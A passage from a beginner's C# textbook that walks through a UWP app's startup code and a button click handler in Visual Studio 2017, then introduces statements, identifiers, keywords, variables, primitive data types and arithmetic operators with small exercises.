App.xaml. If you expand the node for this file, you will see another file called
App.xaml.cs. In a UWP app, the App.xaml file provides the entry point at
which the application starts running. If you double-click App.xaml.cs in
Solution Explorer, you should see some code that looks similar to this:
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices.WindowsRuntime;
using Windows.ApplicationModel;
using Windows.ApplicationModel.Activation;
using Windows.Foundation;
using Windows.Foundation.Collections;
using Windows.UI.Xaml;
using Windows.UI.Xaml.Controls;
using Windows.UI.Xaml.Controls.Primitives;
using Windows.UI.Xaml.Data;
using Windows.UI.Xaml.Input;
using Windows.UI.Xaml.Media;
using Windows.UI.Xaml.Navigation;

namespace Hello
{
    /// <summary>
    /// Provides application-specific behavior to supplement the default Application class.
    /// </summary>
    sealed partial class App : Application
    {
        /// <summary>
        /// Initializes the singleton application object. This is the first line of authored code
        /// executed, and as such is the logical equivalent of main() or WinMain().
        /// </summary>
        public App()
        {
            this.InitializeComponent();
            this.Suspending += OnSuspending;
        }

        /// <summary>
        /// Invoked when the application is launched normally by the end user. Other entry points
        /// will be used such as when the application is launched to open a specific file.
        /// </summary>
        /// <param name="e">Details about the launch request and process.</param>
        protected override void OnLaunched(LaunchActivatedEventArgs e)
        {
            Frame rootFrame = Window.Current.Content as Frame;

            // Do not repeat app initialization when the Window already has content,
            // just ensure that the window is active
            if (rootFrame == null)
            {
                // Create a Frame to act as the navigation context and navigate to the first page
                rootFrame = new Frame();
                rootFrame.NavigationFailed += OnNavigationFailed;

                if (e.PreviousExecutionState == ApplicationExecutionState.Terminated)
                {
                    //TODO: Load state from previously suspended application
                }

                // Place the frame in the current Window
                Window.Current.Content = rootFrame;
            }

            if (e.PrelaunchActivated == false)
            {
                if (rootFrame.Content == null)
                {
                    // When the navigation stack isn't restored navigate to the first page,
                    // configuring the new page by passing required information as a navigation
                    // parameter
                    rootFrame.Navigate(typeof(MainPage), e.Arguments);
                }
                // Ensure the current window is active
                Window.Current.Activate();
            }
        }

        /// <summary>
        /// Invoked when Navigation to a certain page fails
        /// </summary>
        /// <param name="sender">The Frame which failed navigation</param>
        /// <param name="e">Details about the navigation failure</param>
        void OnNavigationFailed(object sender, NavigationFailedEventArgs e)
        {
            throw new Exception("Failed to load Page " + e.SourcePageType.FullName);
        }

        /// <summary>
        /// Invoked when application execution is being suspended. Application state is saved
        /// without knowing whether the application will be terminated or resumed with the contents
        /// of memory still intact.
        /// </summary>
        /// <param name="sender">The source of the suspend request.</param>
        /// <param name="e">Details about the suspend request.</param>
        private void OnSuspending(object sender, SuspendingEventArgs e)
        {
            var deferral = e.SuspendingOperation.GetDeferral();
            //TODO: Save application state and stop any background activity
            deferral.Complete();
        }
    }
}
Much of this code consists of comments (the lines beginning “///”) and
other statements that you don’t need to understand just yet, but the key
elements are located in the OnLaunched method, highlighted in bold. This
method runs when the application starts and the code in this method causes
the application to create a new Frame object, display the MainPage form in
this frame, and then activate it. It is not necessary at this stage to fully
comprehend how this code works or the syntax of any of these statements,
but it’s helpful that you simply appreciate that this is how the application
displays the form when it starts running.
Adding code to the graphical application
Now that you know a little bit about the structure of a graphical application,
the time has come to write some code to make your application actually do
something.
Write the code for the OK button
1. In the Design View window, open the MainPage.xaml file (double-click
MainPage.xaml in Solution Explorer).
2. While still in the Design View window, click the OK button on the form
to select it.
3. In the Properties window, click the Event Handlers button for the
selected element.
This button displays an icon that looks like a bolt of lightning, as
demonstrated here:
The Properties window displays a list of event names for the Button
control. An event indicates a significant action that usually requires a
response, and you can write your own code to perform this response.
4. In the box adjacent to the Click event, type okClick, and then press
Enter.
The MainPage.xaml.cs file appears in the Code and Text Editor window,
and a new method named okClick is added to the MainPage class. The
method looks like this:
private void okClick(object sender, RoutedEventArgs e)
{
}
Do not worry too much about the syntax of this code just yet—you will
learn all about methods in Chapter 3.
5. Add the following using directive shown in bold to the list at the top of
the file (the ellipsis character […] indicates statements that have been
omitted for brevity):
using System;
...
using Windows.UI.Xaml.Navigation;
using Windows.UI.Popups;
6. Add the following code shown in bold to the okClick method:
private void okClick(object sender, RoutedEventArgs e)
{
    MessageDialog msg = new MessageDialog("Hello " + userName.Text);
    msg.ShowAsync();
}
This code will run when the user clicks the OK button. Again, do not
worry too much about the syntax, just be sure that you copy the code
exactly as shown; you will find out what these statements mean in the
next few chapters. The key things to understand are that the first
statement creates a MessageDialog object with the message “Hello
<YourName>”, where <YourName> is the name that you type into the
TextBox on the form. The second statement displays the MessageDialog,
causing it to appear on the screen. The MessageDialog class is defined
in the Windows.UI.Popups namespace, which is why you added it in
step 5.
Note You might notice that Visual Studio 2017 adds a wavy green
line under the last line of code you typed. If you hover over this
line of code, Visual Studio displays a warning that states “Because
this call is not awaited, execution of the current method continues
before the call is completed. Consider applying the ‘await’
operator to the result of the call.” Essentially, this warning means
that you are not taking full advantage of the asynchronous
functionality that the .NET Framework provides. You can safely
ignore this warning.
7. Click the MainPage.xaml tab above the Code and Text Editor window to
display the form in the Design View window again.
8. In the lower pane displaying the XAML description of the form,
examine the Button element, but be careful not to change anything.
Notice that it now contains an attribute named Click that refers to the
okClick method.
<Button x:Name="ok" ... Click="okClick" />
9. On the Debug menu, click Start Debugging.
10. When the form appears, in the text box, type your name over the
existing text, and then click OK.
A message dialog box appears displaying the following greeting:
11. Click Close in the message box.
12. Return to Visual Studio 2017 and then, on the Debug menu, click Stop
Debugging.
Other types of graphical applications
Apart from Universal Windows apps, Visual Studio 2017 also lets you
create other types of graphical applications. These applications are
intended for specific environments and do not include the adaptability
to enable them to run across multiple platforms unchanged.
The other types of graphical applications available include:
WPF App. You can find this template in the list of Windows
Classic Desktop templates in Visual Studio 2017. WPF stands for
“Windows Presentation Foundation.” WPF is targeted at
applications that run on the Windows desktop, rather than
applications that can adapt to a range of different devices and
form factors. It provides an extremely powerful framework based
on vector graphics that enable the user interface to scale smoothly
across different screen resolutions. Many of the key features of
WPF are available in UWP applications, although WPF provides
additional functionality that is only appropriate for applications
running on powerful desktop machines.
Windows Forms App. This is an older graphical library that dates
back to the origins of the .NET Framework. You can also find
this template in the Windows Classic Desktop template list in Visual Studio
2017. As its name implies, the Windows Forms library is
intended for building more classical forms-based applications
using the Graphics Device Interface (GDI) libraries provided with
Windows at that time. While this framework is quick to use, it
provides neither the functionality and scalability of WPF nor the
portability of UWP.
If you are building graphical applications, unless you have good
reasons not to do so, I would suggest that you opt for the UWP
template.
Summary
In this chapter, you saw how to use Visual Studio 2017 to create, build, and
run applications. You created a console application that displays its output in
a console window, and you created a Universal Windows Platform
application with a simple GUI.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 2.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes to save the project.
Quick reference
To: Create a new console application using Visual Studio 2017
Do this: On the File menu, point to New, and then click Project to open
the New Project dialog box. In the left pane, expand Installed,
and then click Visual C#. In the middle pane, click Console
Application. In the Location box, specify a directory for the
project files. Type a name for the project, and then click OK.

To: Create a new Universal Windows app using Visual Studio 2017
Do this: On the File menu, point to New, and then click Project to open
the New Project dialog box. In the left pane, expand Installed,
expand Visual C#, expand Windows, and then click Universal.
In the middle pane, click Blank App (Universal Windows). In
the Location box, specify a directory for the project files. Type
a name for the project, and then click OK.

To: Build the application
Do this: On the Build menu, click Build Solution.

To: Run the application in debug mode
Do this: On the Debug menu, click Start Debugging.

To: Run the application without debugging
Do this: On the Debug menu, click Start Without Debugging.
CHAPTER 2
Working with variables, operators,
and expressions
After completing this chapter, you will be able to:
Understand statements, identifiers, and keywords.
Use variables to store information.
Work with primitive data types.
Use arithmetic operators such as the plus sign (+) and the minus sign
(–).
Increment and decrement variables.
Chapter 1, “Welcome to C#,” presents how to use the Microsoft Visual
Studio 2017 programming environment to build and run a console program
and a graphical application. This chapter introduces you to the elements of
Microsoft Visual C# syntax and semantics, including statements, keywords,
and identifiers. You’ll study the primitive types that are built into the C#
language and the characteristics of the values that each type holds. You’ll
also see how to declare and use local variables (variables that exist only in a
method or another small section of code), learn about the arithmetic operators
that C# provides, find out how to use operators to manipulate values, and
learn how to control expressions containing two or more operators.
Understanding statements
A statement is a command that performs an action, such as calculating a
value and storing the result or displaying a message to a user. You combine
statements to create methods. You’ll learn more about methods in Chapter 3,
“Writing methods and applying scope,” but for now, think of a method as a
named sequence of statements. Main, which was introduced in the previous
chapter, is an example of a method.
Statements in C# follow a well-defined set of rules describing their format
and construction. These rules are collectively known as syntax. (In contrast,
the specification of what statements do is collectively known as semantics.)
One of the simplest and most important C# syntax rules states that you must
terminate all statements with a semicolon. For example, Chapter 1
demonstrates that without the terminating semicolon, the following statement
won’t compile:
Console.WriteLine("Hello, World!");
Tip C# is a “free format” language, which means that white space, such
as a space character or a new line, is not significant except as a
separator. In other words, you are free to lay out your statements in any
style you choose. However, you should adopt a simple, consistent
layout style to make your programs easier to read and understand.
The trick to programming well in any language is to learn the syntax and
semantics of the language and then use the language in a natural and
idiomatic way. This approach makes your programs easier to maintain. As
you progress through this book, you’ll see examples of the most important C#
statements.
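For example, the following method (a sketch using only statements you have
already seen) combines two statements into a named sequence, each terminated
with a semicolon:

static void Main(string[] args)
{
    Console.WriteLine("Hello, World!"); // display a message
    Console.ReadLine();                 // wait for the user to press Enter
}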
Using identifiers
Identifiers are the names that you use to identify the elements in your
programs, such as namespaces, classes, methods, and variables. (You will
learn about variables shortly.) In C#, you must adhere to the following syntax
rules when choosing identifiers:
You can use only letters (uppercase and lowercase), digits, and
underscore characters.
An identifier must start with a letter or an underscore.
For example, result, _score, footballTeam, and plan9 are all valid
identifiers, whereas result%, footballTeam$, and 9plan are not.
Important C# is a case-sensitive language: footballTeam and
FootballTeam are two different identifiers.
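To illustrate (a sketch; variable declarations are covered later in this
chapter), the following declarations use valid identifiers, whereas the
commented-out lines would not compile:

int result;        // valid: starts with a letter
int _score;        // valid: starts with an underscore
int plan9;         // valid: digits are allowed after the first character
// int result%;    // invalid: % is not a letter, digit, or underscore
// int 9plan;      // invalid: an identifier must not start with a digit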
Identifying keywords
The C# language reserves 77 identifiers for its own use, and you cannot reuse
these identifiers for your own purposes. These identifiers are called
keywords, and each has a particular meaning. Examples of keywords are
class, namespace, and using. You’ll learn the meaning of most of the C#
keywords as you proceed through this book. The following is the list of
keywords:
abstract    do          in          protected   true
as          double      int         public      try
base        else        interface   readonly    typeof
bool        enum        internal    ref         uint
break       event       is          return      ulong
byte        explicit    lock        sbyte       unchecked
case        extern      long        sealed      unsafe
catch       false       namespace   short       ushort
char        finally     new         sizeof      using
checked     fixed       null        stackalloc  virtual
class       float       object      static      void
const       for         operator    string      volatile
continue    foreach     out         struct      while
decimal     goto        override    switch
default     if          params      this
delegate    implicit    private     throw
Tip In the Visual Studio 2017 Code and Text Editor window, keywords
are colored blue when you type them.
C# also uses the following identifiers. These identifiers are not reserved
by C#, which means that you can use these names as identifiers for your own
methods, variables, and classes, but you should avoid doing so if at all
possible.
add         global      select
alias       group       set
ascending   into        value
async       join        var
await       let         when
descending  nameof      where
dynamic     orderby     yield
from        partial
get         remove
Using variables
A variable is a storage location that holds a value. You can think of a
variable as a box in the computer’s memory that holds temporary
information. You must give each variable in a program an unambiguous
name that uniquely identifies it in the context in which it is used. You use a
variable’s name to refer to the value it holds. For example, if you want to
store the value of the cost of an item in a store, you might create a variable
simply called cost and store the item’s cost in this variable. Later on, if you
refer to the cost variable, the value retrieved will be the item’s cost that you
stored there earlier.
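A minimal sketch of this idea (using the decimal type described later in this
chapter):

decimal cost;             // declare a variable to hold an item's cost
cost = 2.99M;             // store the item's cost in the variable
Console.WriteLine(cost);  // retrieve and display the value stored earlier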
Naming variables
You should adopt a naming convention for variables that helps you avoid
confusion concerning the variables you have defined. This is especially
important if you are part of a project team with several developers working
on different parts of an application; a consistent naming convention helps to
avoid confusion and can reduce the scope for bugs. The following list
contains some general recommendations:
Don’t start an identifier with an underscore. Although this is legal in
C#, it can limit the interoperability of your code with applications built
by using other languages, such as Microsoft Visual Basic.
Don’t create identifiers that differ only by case. For example, do not
create one variable named myVariable and another named MyVariable
for use at the same time because it is too easy to confuse one with the
other. Also, defining identifiers that differ only by case can limit the
ability to reuse classes in applications developed with other languages
that are not case-sensitive, such as Visual Basic.
Start the name with a lowercase letter.
In a multi-word identifier, start the second and each subsequent word
with an uppercase letter. (This is called camelCase notation.)
Don’t use Hungarian notation. (If you are a Microsoft Visual C++
developer, you are probably familiar with Hungarian notation. If you
don’t know what Hungarian notation is, don’t worry about it!)
For example, score, footballTeam, _score, and FootballTeam are all valid
variable names, but only the first two are recommended.
Declaring variables
Variables hold values. C# has many different types of values that it can store
and process: integers, floating-point numbers, and strings of characters, to
name three. When you declare a variable, you must specify the type of data it
will hold.
You declare the type and name of a variable in a declaration statement.
For example, the statement that follows declares that the variable named age
holds int (integer) values. As always, you must terminate the statement with a
semicolon.
int age;
The variable type int is the name of one of the primitive C# types, integer,
which is a whole number. (You’ll learn about several primitive data types
later in this chapter.)
Note If you are a Visual Basic programmer, you should note that C#
does not allow implicit variable declarations. You must explicitly
declare all variables before you use them.
After you’ve declared your variable, you can assign it a value. The
statement that follows assigns age the value 42. Again, note that the
semicolon is required.
age = 42;
The equal sign (=) is the assignment operator, which assigns the value on
its right to the variable on its left. After this assignment, you can use the age
variable in your code to refer to the value it holds. The next statement writes
the value of the age variable (42) to the console:
Console.WriteLine(age);
Tip If you leave the mouse pointer over a variable in the Visual Studio
2017 Code and Text Editor window, a ScreenTip indicates the type of
the variable.
Specifying numeric values
It’s important to understand the impact of variable type on the data that a
variable can hold, and how this data is handled. For example, it should be
obvious that a numeric variable cannot hold a string value such as “Hello.”
However, in some cases, the type of a value being assigned to a variable is
not always so clear-cut.
Take the literal value 42 as an example. It is numeric. Furthermore, it is an
integer, and you can assign it directly to an integer variable. But what
happens if you try to assign this value to a non-integer type, such as a
floating-point variable? The answer is that C# will silently convert the integer
value to a floating-point value. This is relatively harmless but is not
necessarily good practice. You should really specify that you intended to treat
the literal value 42 as a floating-point number and haven’t mistakenly
assigned it to the wrong type of variable. You can do this by appending the
“F” suffix to the numeric literal, like this:
float myVar; // declare a floating-point variable
myVar = 42F; // assign a floating-point value to the variable
How about the value 0.42; what is the type of this expression? The answer
is that, like all numeric literals that include a decimal point, it is actually a
double-precision floating-point number, referred to as a double for short. You
will see in the next section that a double has a bigger range and greater
precision than a float. If you want to assign the value 0.42 to a float, you
should apply the “F” suffix (the C# compiler actually insists on this):
myVar = 0.42F;
C# has other numeric types: long integers, which have a bigger range than
integers, and decimals, which hold exact decimal values (floats and doubles
can be subject to rounding and other approximations when they are involved
in calculations). You should use the “L” suffix to assign a numeric literal
value to a long, and the “M” suffix to assign a numeric literal value to a
decimal.
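For example, the following sketch (the variable names are invented for illustration) shows each suffix in use:

long bigNumber = 9876543210L;   // "L" suffix: the literal is a long
decimal price = 19.99M;         // "M" suffix: the literal is a decimal
float ratio = 0.5F;             // "F" suffix: the literal is a float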
This might seem to be a trivial point, but it is surprising how many subtle
errors can creep into a program by accidentally assigning a value of the
wrong type to a variable. Consider what might happen if you attempt to
perform a calculation that involves a large number of significant decimal
places and store the results in a float. In the worst case, this could lead to
truncated data and errors in calculations, with the result that your
guidance application sends your space probe sailing past Mars and off into
the outer reaches of the solar system instead!
Working with primitive data types
The numeric types of C#, together with other common types for holding
strings, characters, and Boolean values, are collectively known as the
primitive data types. The following table lists the most commonly used
primitive data types and the range of values that you can store in each.
Data type | Description | Size (bits) | Range | Sample usage
int | Whole numbers (integers) | 32 | −2^31 through 2^31 − 1 | int count; count = 42;
long | Whole numbers (bigger range) | 64 | −2^63 through 2^63 − 1 | long wait; wait = 42L;
float | Floating-point numbers | 32 | −3.4 × 10^−38 through 3.4 × 10^38 | float away; away = 0.42F;
double | Double-precision (more accurate) floating-point numbers | 64 | ±5.0 × 10^−324 through ±1.7 × 10^308 | double trouble; trouble = 0.42;
decimal | Monetary values | 128 | 28 significant figures | decimal coin; coin = 0.42M;
string | Sequence of characters | 16 bits per character | Not applicable | string vest; vest = "forty two";
char | Single character | 16 | A single character | char grill; grill = 'x';
bool | Boolean | 8 | True or false | bool teeth; teeth = false;
Unassigned local variables
When you declare a variable, it contains a random value until you assign a
value to it. This behavior was a rich source of bugs in C and C++ programs
that created a variable and accidentally used it as a source of information
before giving it a value. C# does not allow you to use an unassigned variable.
You must assign a value to a variable before you can use it; otherwise, your
program will not compile. This requirement is called the definite assignment
rule. For example, the following statements generate the compile-time error
message, “Use of unassigned local variable ‘age’” because the
Console.WriteLine statement attempts to display the value of an uninitialized
variable:
int age; Console.WriteLine(age); // compile-time error
Displaying primitive data type values
In the following exercise, you use a C# program named PrimitiveDataTypes
to demonstrate how several primitive data types work.
Display primitive data type values
1. Start Visual Studio 2017 if it is not already running.
2. On the File menu, point to Open, and then click Project/Solution.
The Open Project dialog box appears.
3. Move to the \Microsoft Press\VCSBS\Chapter 2\PrimitiveDataTypes
folder in your Documents folder.
4. Select the PrimitiveDataTypes solution file, and then click Open.
The solution loads, and Solution Explorer displays the
PrimitiveDataTypes project.
Note Solution file names have the .sln suffix, such as
PrimitiveDataTypes.sln. A solution can contain one or more
projects. Visual C# project files have the .csproj suffix. If you open
a project rather than a solution, Visual Studio 2017 automatically
creates a new solution file for it. This situation can be confusing if
you are not aware of this feature because it can result in you
accidentally generating multiple solutions for the same project.
5. On the Debug menu, click Start Debugging.
You might see some warnings in Visual Studio. You can safely ignore
them. (You will correct them in the next exercise.)
6. In the Choose A Data Type list, click string.
The text “forty two” appears in the Sample Value box.
7. Again, in the Choose A Data Type list, click the int type.
The text “to do” appears in the Sample Value box, indicating that the
statements to display an int value still need to be written.
8. Click each data type in the list. Confirm that the code for the double and
bool types is not yet implemented; the application displays the results as
“to do.”
9. Return to Visual Studio 2017 and then, on the Debug menu, click Stop
Debugging.
You can also close the window to stop debugging.
Use primitive data types in code
1. In Solution Explorer, expand the PrimitiveDataTypes project (if it is not
already expanded), and then double-click MainPage.xaml.
The application form appears in the Design View window.
Hint If your screen is not big enough to display the entire form,
you can zoom in and out in the Design View window by using
Ctrl+Alt+= and Ctrl+Alt+– or by selecting the size from the Zoom
drop-down list in the lower-left corner of the Design View
window.
2. In the XAML pane, scroll down to locate the markup for the ListBox
control. This control displays the list of data types in the left part of the
form, and it looks like this (some of the properties have been removed
from this text):
<ListBox x:Name="type" ...
SelectionChanged="typeSelectionChanged">
<ListBoxItem>int</ListBoxItem>
<ListBoxItem>long</ListBoxItem>
<ListBoxItem>float</ListBoxItem>
<ListBoxItem>double</ListBoxItem>
<ListBoxItem>decimal</ListBoxItem>
<ListBoxItem>string</ListBoxItem>
<ListBoxItem>char</ListBoxItem>
<ListBoxItem>bool</ListBoxItem>
</ListBox>
The ListBox control displays each data type as a separate ListBoxItem.
When the application is running, if a user clicks an item in the list, the
SelectionChanged event occurs (this is a little bit like the Click event
that occurs when the user clicks a button, which is demonstrated in
Chapter 1). You can see that in this case, the ListBox invokes the
typeSelectionChanged method. This method is defined in the
MainPage.xaml.cs file.
3. On the View menu, click Code.
The Code and Text Editor window opens, displaying the
MainPage.xaml.cs file.
Note Remember that you can also use Solution Explorer to access
the code. Click the arrow to the left of the MainPage.xaml file to
expand the node, and then double-click MainPage.xaml.cs.
4. In the Code and Text Editor window, find the typeSelectionChanged
method.
Tip To locate an item in your project, on the Edit menu, point to
Find And Replace, and then click Quick Find. A menu opens in the
upper-right corner of the Code and Text Editor window. In the text
box on this shortcut menu, type the name of the item you’re
looking for, and then click Find Next (the right-arrow symbol next
to the text box):
By default, the search is not case-sensitive. If you want to perform a
case-sensitive search, click the Match Case button (Aa) below the text
for which you are searching.
Instead of using the Edit menu, you can also press Ctrl+F to display the
Quick Find dialog box. Similarly, you can press Ctrl+H to display the
Quick Replace dialog box.
As an alternative to using the Quick Find functionality, you can also
locate the methods in a class by using the class members drop-down list
box above the Code and Text Editor window, on the right.
The class members drop-down list box displays all the methods in the
class, together with the variables and other items that the class contains.
(You will learn more about these items in later chapters.) In the drop-
down list, click the typeSelectionChanged method, and the cursor will
move directly to the typeSelectionChanged method in the class.
If you have programmed using another language, you can probably
guess how the typeSelectionChanged method works; if not, Chapter 4,
“Using decision statements,” makes this code clear. At present, all you
need to understand is that when the user clicks an item in the ListBox
control, the details of the item are passed to this method, which then
uses this information to determine what happens next. For example, if
the user clicks the float value, this method calls another method named
showFloatValue.
5. Scroll down through the code and find the showFloatValue method,
which looks like this:
private void showFloatValue()
{
float floatVar;
floatVar = 0.42F;
value.Text = floatVar.ToString();
}
The body of this method contains three statements. The first statement
declares a variable named floatVar of type float.
The second statement assigns floatVar the value 0.42F.
Important Remember that the F is a type suffix specifying that
0.42 should be treated as a float value. If you forget the F, the
value 0.42 is treated as a double, and your program will not
compile because you cannot assign a value of one type to a
variable of a different type without writing additional code. C# is
very strict in this respect.
The third statement displays the value of this variable in the value text
box on the form. This statement requires your attention. As is illustrated
in Chapter 1, the way you display an item in a text box is to set its Text
property (you did this by using XAML in Chapter 1). You can also
perform this task programmatically, which is what is going on here.
Notice that you access the property of an object by using the same dot
notation that you saw for running a method. (Remember
Console.WriteLine from Chapter 1?) Also, the data that you put in the
Text property must be a string and not a number. If you try to assign a
number to the Text property, your program will not compile.
Fortunately, the .NET Framework provides some help in the form of the
ToString method.
Every data type in the .NET Framework has a ToString method. The
purpose of ToString is to convert an object to its string representation.
The showFloatValue method uses the ToString method of the float
variable floatVar to generate a string version of the value of this
variable. You can then safely assign this string to the Text property of
the value text box. When you create your own data types and classes,
you can define your own implementation of the ToString method to
specify how your class should be represented as a string. You learn more
about creating your own classes in Chapter 7, “Creating and managing
classes and objects.”
6. In the Code and Text Editor window, locate the showIntValue method:
private void showIntValue()
{
value.Text = "to do";
}
The showIntValue method is called when you click the int type in the list
box.
7. At the start of the showIntValue method, on a new line after the opening
brace, type the following two statements shown in bold:
private void showIntValue()
{
int intVar;
intVar = 42;
value.Text = "to do";
}
The first statement creates a variable called intVar that can hold an int
value. The second statement assigns the value 42 to this variable.
8. In the original statement in this method, change the string “to do” to
intVar.ToString();
The method should now look exactly like this:
private void showIntValue()
{
int intVar;
intVar = 42;
value.Text = intVar.ToString();
}
9. On the Debug menu, click Start Debugging.
The form appears again.
10. In the Choose A Data Type list, select the int type. Confirm that the
value 42 is displayed in the Sample Value text box.
11. Return to Visual Studio and then, on the Debug menu, click Stop
Debugging.
12. In the Code and Text Editor window, find the showDoubleValue
method.
13. Edit the showDoubleValue method exactly as shown in bold type in the
following code:
private void showDoubleValue()
{
double doubleVar;
doubleVar = 0.42;
value.Text = doubleVar.ToString();
}
This code is similar to the showIntValue method, except that it creates a
variable called doubleVar that holds double values and is assigned the
value 0.42.
14. In the Code and Text Editor window, locate the showBoolValue method.
15. Edit the showBoolValue method exactly as follows:
private void showBoolValue()
{
bool boolVar;
boolVar = false;
value.Text = boolVar.ToString();
}
Again, this code is similar to the previous examples, except that boolVar
can only hold a Boolean value, true or false. In this case, the value
assigned is false.
16. On the Debug menu, click Start Debugging.
17. In the Choose A Data Type list, select the float, double, and bool types.
In each case, verify that the correct value is displayed in the Sample
Value text box.
18. Return to Visual Studio and then, on the Debug menu, click Stop
Debugging.
Using arithmetic operators
C# supports the regular arithmetic operations you learned in your childhood:
the plus sign (+) for addition, the minus sign (–) for subtraction, the asterisk
(*) for multiplication, and the forward slash (/) for division. The symbols +,
–, *, and / are called operators because they “operate” on values to create
new values. In the following example, the variable moneyPaidToConsultant
ends up holding the product of 750 (the daily rate) and 20 (the number of
days the consultant was employed):
long moneyPaidToConsultant;
moneyPaidToConsultant = 750 * 20;
Note The values on which an operator performs its function are called
operands. In the expression 750 * 20, the * is the operator, and 750 and
20 are the operands.
Operators and types
Not all operators apply to all data types. The operators that you can use on a
value depend on the value’s type. For example, you can use all the arithmetic
operators on values of type char, int, long, float, double, or decimal.
However, except for the plus operator (+), you can’t use the arithmetic
operators on values of type string, and you cannot use any of them with
values of type bool. So, the following statement is not allowed because the
string type does not support the minus operator (subtracting one string from
another is meaningless):
// compile-time error
Console.WriteLine("Gillingham" - "Forest Green Rovers");
However, you can use the + operator to concatenate string values. You
need to be careful because this can have unexpected results. For example, the
following statement writes “431” (not “44”) to the console:
Console.WriteLine("43" + "1");
Tip The .NET Framework provides a method called Int32.Parse that
you can use to convert a string value to an integer if you need to
perform arithmetic computations on values held as strings.
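As a minimal sketch of the approach described in this tip (the values are invented for illustration):

string storedValue = "43";
int number = Int32.Parse(storedValue);  // convert the string to an int
Console.WriteLine(number + 1);          // arithmetic now works: writes 44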
String interpolation
A feature added recently to C# is string interpolation, which renders
many uses of the + operator obsolete for concatenating strings.
A common use of string concatenation is to generate string values
that include variable values. You saw an example of this in the
exercises in Chapter 1 that created a graphical application. In the
okClick method you added the following line of code:
MessageDialog msg = new MessageDialog("Hello " + userName.Text);
String interpolation lets you use the following syntax instead:
MessageDialog msg = new MessageDialog($"Hello {userName.Text}");
The $ symbol at the start of the string indicates that it is an
interpolated string and that any expressions between the { and }
characters should be evaluated and the result substituted in their place.
Without the leading $ symbol, the string {username.Text} would be
treated literally.
String interpolation is more efficient than using the + operator; string
concatenation using the + operator can be memory hungry by virtue of
the way in which strings are handled by the .NET Framework. String
interpolation is also arguably more readable and less error-prone.
You should also be aware that the type of the result of an arithmetic
operation depends on the type of the operands used. For example, the value
of the expression 5.0/2.0 is 2.5; the type of both operands is double, so the
type of the result is also double. (Remember that in C#, literal numbers with
decimal points are always double, not float, to maintain as much accuracy as
possible.) However, the value of the expression 5/2 is 2. In this case, the type
of both operands is int, so the type of the result is also int. C# always rounds
toward zero in circumstances like this. The situation gets a little more
complicated if you mix the types of the operands. For example, the
expression 5/2.0 consists of an int and a double. The C# compiler detects the
mismatch and generates code that converts the int into a double before
performing the operation. The result of the operation is, therefore, a double
(2.5). However, although this works, it is considered poor practice to mix
types in this way.
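The following sketch (with invented variable names) summarizes these rules:

double d1 = 5.0 / 2.0;  // both operands are double; the result is 2.5
int i1 = 5 / 2;         // both operands are int; the result is 2
double d2 = 5 / 2.0;    // the int operand is converted to double; the result is 2.5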
C# also supports a less-familiar arithmetic operator: the remainder, or
modulus, operator, which is represented by the percent sign (%). The result of
x % y is the integer remainder after dividing the integer value x by the integer
value y. So, for example, 9 % 2 is 1 because 9 divided by 2 is 4, remainder 1.
Note If you are familiar with C or C++, you know that you can’t use the
remainder operator on float or double values in these languages.
However, C# relaxes this rule. The remainder operator is valid with all
numeric types, and the result is not necessarily an integer. For example,
the result of the expression 7.0 % 2.4 is 2.2.
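For example, you can confirm this with a short sketch (bear in mind that floating-point results are subject to rounding):

double remainder = 7.0 % 2.4;
Console.WriteLine(remainder);  // writes a value very close to 2.2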
Numeric types and infinite values
There are one or two other features of numbers in C# about which you
should be aware. For example, the result of dividing any number by
zero is infinity, which is outside the range of the int, long, and decimal
types; consequently, evaluating an expression such as 5/0 results in an
error. However, the double and float types actually have a special value
that can represent infinity, and the value of the expression 5.0/0.0 is
Infinity. The one exception to this rule is the value of the expression
0.0/0.0. Usually, if you divide zero by anything, the result is zero, but if
you divide anything by zero, the result is infinity. The expression
0.0/0.0 results in a paradox; the value must be zero and infinity at the
same time. C# has another special value for this situation called NaN,
which stands for “not a number.” So if you evaluate 0.0/0.0, the result is
NaN.
NaN and Infinity propagate through expressions. If you evaluate 10 +
NaN, the result is NaN, and if you evaluate 10 + Infinity, the result is
Infinity. The value of the expression Infinity * 0 is NaN.
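The following sketch illustrates these special values (the exact text written for an infinite value depends on the version of the .NET runtime):

double infinity = 5.0 / 0.0;                  // Infinity
double notANumber = 0.0 / 0.0;                // NaN
Console.WriteLine(double.IsNaN(notANumber));  // writes True
Console.WriteLine(10 + infinity);             // Infinity propagates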
Examining arithmetic operators
The following exercise demonstrates how to use the arithmetic operators on
int values.
Run the MathsOperators project
1. Start Visual Studio 2017 if it is not already running.
2. Open the MathsOperators solution, located in the \Microsoft
Press\VCSBS\Chapter 2\MathsOperators folder in your Documents
folder.
3. On the Debug menu, click Start Debugging.
The following form appears:
4. In the Left Operand box, type 54.
5. In the Right Operand box, type 13.
You can now apply any of the operators to the values in the text boxes.
6. Click the – Subtraction option, and then click Calculate.
The text in the Expression box changes to 54 – 13, but the value 0
appears in the Result box; this is clearly wrong.
7. Click the / Division option, and then click Calculate.
The text in the Expression box changes to 54/13, and again the value 0
appears in the Result box.
8. Click the % Remainder button, and then click Calculate.
The text in the Expression box changes to 54 % 13, but, once again, the
value 0 appears in the Result text box. Test other combinations of
numbers and operators; you will find that they all currently yield the
value 0.
Note If you type a non-integer value into either of the operand
boxes, the application detects an error and displays the message
“Input string was not in a correct format.” You will learn more
about how to catch and handle errors and exceptions in Chapter 6,
“Managing errors and exceptions.”
9. When you have finished, return to Visual Studio and then, on the Debug
menu, click Stop Debugging.
As you might have guessed, none of the calculations are currently
implemented by the MathsOperators application. In the next exercise, you
will correct this.
Perform calculations in the MathsOperators application
1. Display the MainPage.xaml form in the Design View window. (In
Solution Explorer, in the MathsOperators project, double-click the file
MainPage.xaml.)
2. On the View menu, point to Other Windows, and then click Document
Outline.
The Document Outline window appears, showing the names and types
of the controls on the form. The Document Outline window provides a
simple way to locate and select controls on a complex form. The
controls are arranged in a hierarchy, starting with the Page that
constitutes the form. As mentioned in Chapter 1, a Universal Windows
Platform (UWP) app page contains a Grid control, and the other controls
are placed within this Grid. If you expand the Grid node in the
Document Outline window, the other controls appear, starting with
another Grid (the outer Grid acts as a frame, and the inner Grid contains
the controls that you see on the form). If you expand the inner Grid, you
can see each of the controls on the form.
If you click any of these controls, the corresponding element is
highlighted in the Design View window. Similarly, if you select a
control in the Design View window, the corresponding control is
selected in the Document Outline window. (To see this in action, pin the
Document Outline window in place by deselecting the Auto Hide button
